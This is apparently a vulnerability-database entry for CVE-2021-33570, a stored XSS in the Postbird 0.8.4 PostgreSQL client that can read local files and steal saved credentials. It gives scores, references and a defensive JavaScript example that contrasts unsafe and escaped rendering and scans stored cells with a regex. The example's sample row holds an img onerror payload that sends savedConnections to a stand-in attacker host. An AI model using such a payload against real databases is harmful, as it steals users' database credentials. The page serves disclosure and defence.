CVE-2021-33570

MEDIUM

Postbird 0.8.4 - Stored Cross-Site Scripting via IMG onerror Attribute

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2021-33570. PoCs published by Debshubra Chakraborty.

AI-analyzed exploit summary: The PoC demonstrates stored JavaScript injection in Postbird 0.8.4. A crafted cell value containing an IMG element with an onerror handler executes when the table is opened in the client, giving XSS, local file read (the page calls this LFI) via XMLHttpRequest to file:/// URLs, and theft of saved PostgreSQL connection credentials from localStorage. The PoC includes a Python HTTP server that receives the data exfiltrated from the victim's machine.

Description

Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections. The root cause is that the client renders cell contents as HTML rather than as text: because Postbird is an Electron desktop application, script injected this way runs inside the desktop client, which is why the file:/// read and the localStorage credential read are reachable from a single poisoned row.
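The mechanism described above, as an added example (not Postbird's own code and not the published PoC): a Node.js script that renders constructed rows the vulnerable way (cell text interpolated straight into markup) and the fixed way (escaped), then scans stored cells for handler attributes so a poisoned table can be found before anyone opens it in a GUI client. The table and column names, the attacker.example host and the use of a savedConnections localStorage key in the sample payload are assumptions for illustration.

```javascript
// Added example, not Postbird's source or the published PoC.
// Models the sink behind CVE-2021-33570: a PostgreSQL cell value rendered
// into the client's HTML as-is, so an <img onerror> stored in the table runs
// when the table is opened. Also shows the escaped rendering that closes the
// hole and a scan that flags cells already carrying event-handler attributes.

// Constructed sample rows, standing in for a SELECT over a table an attacker
// with INSERT/UPDATE rights could poison (hypothetical table "notes", column
// "note"). Row 2 carries an illustrative exfiltration payload; the
// savedConnections key name comes from the CVE text, its format is assumed.
const SAMPLE_ROWS = [
  { id: 1, note: "plain text, < and & included" },
  {
    id: 2,
    note:
      '<img src=x onerror="fetch(\'http://attacker.example/?c=\' + ' +
      'encodeURIComponent(localStorage.getItem(\'savedConnections\')))">',
  },
  { id: 3, note: '<img src="x.png" alt="tag with no handler attribute">' },
];

// Minimal escaping for text placed inside an element body or a double-quoted
// attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable sink: the cell text becomes markup, so a stored tag is parsed and
// its onerror handler fires as soon as the broken image fails to load.
function renderCellUnsafe(value) {
  return `<td>${value}</td>`;
}

// Fixed sink: the same value is rendered as inert text.
function renderCellSafe(value) {
  return `<td>${escapeHtml(value)}</td>`;
}

// Renders every row with the supplied cell renderer; fixed column order keeps
// the output deterministic.
function renderTable(rows, renderCell) {
  const columns = ["id", "note"];
  const body = rows
    .map((row) => `<tr>${columns.map((c) => renderCell(row[c])).join("")}</tr>`)
    .join("");
  return `<table>${body}</table>`;
}

// Heuristic for stored payloads: a tag carrying an on* attribute, or a
// <script> tag, inside a text value. Cheap enough to run across every text
// column of a database before it is opened in a client that renders HTML.
const HANDLER_OR_SCRIPT = /<\s*[a-z][^>]*\bon[a-z]+\s*=|<\s*script\b/i;

// Returns {id, column} for each cell whose text matches the heuristic.
function findSuspiciousCells(rows, columns) {
  const hits = [];
  for (const row of rows) {
    for (const col of columns) {
      if (typeof row[col] === "string" && HANDLER_OR_SCRIPT.test(row[col])) {
        hits.push({ id: row.id, column: col });
      }
    }
  }
  return hits;
}

// True when rendered markup still contains a live handler or script tag; used
// to compare the two renderers over the same rows.
function containsLiveHandler(html) {
  return HANDLER_OR_SCRIPT.test(html);
}
```

Run `containsLiveHandler(renderTable(SAMPLE_ROWS, renderCellUnsafe))` and the same call with `renderCellSafe`: the first returns true because row 2's handler survives into the markup, the second returns false because every angle bracket and quote in the cell was escaped. `findSuspiciousCells(SAMPLE_ROWS, ["note"])` flags only row 2; row 3 contains a tag but no handler, and row 1's bare `<` is not a tag. The scan is a heuristic for triage, not a substitute for fixing the sink: escaping at render time (or setting `textContent` instead of `innerHTML`) is what removes the vulnerability class.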

Exploits (1)

Exploit-DB · Working PoC
by Debshubra Chakraborty · python · webapps · multiple
https://www.exploit-db.com/exploits/49910

Classification
Working PoC (95% confidence)
Attack Type
Xss
Complexity
Trivial
Reliability
Reliable
Target: Postbird 0.8.4
Auth: the attacker needs write access to a PostgreSQL table the victim will browse (CVSS PR:L); no separate authentication to Postbird itself is involved
Prerequisites: the victim opens the poisoned table in Postbird, so the stored payload is rendered and its onerror handler runs (CVSS UI:R)
devstral-2 · analyzed Feb 16, 2026

References (8)

Core References
Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/Paxa/postbird/issues/132
Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/Paxa/postbird/issues/133
Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/Paxa/postbird/issues/134
Exploit, Third Party Advisory x_refsource_misc
https://github.com/Tridentsec-io/postbird
Exploit, Third Party Advisory, VDB Entry x_refsource_misc
https://www.exploit-db.com/exploits/49910
Broken Link, Third Party Advisory, URL Repurposed x_refsource_misc
https://tridentsec.io/blogs/postbird-cve-2021-33570/

Scores

CVSS v3 5.4
EPSS 0.0356
EPSS Percentile 87.8%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-79
Status published
Products (1)
postbird_project/postbird 0.8.4
Published May 25, 2021
Tracked Since Feb 18, 2026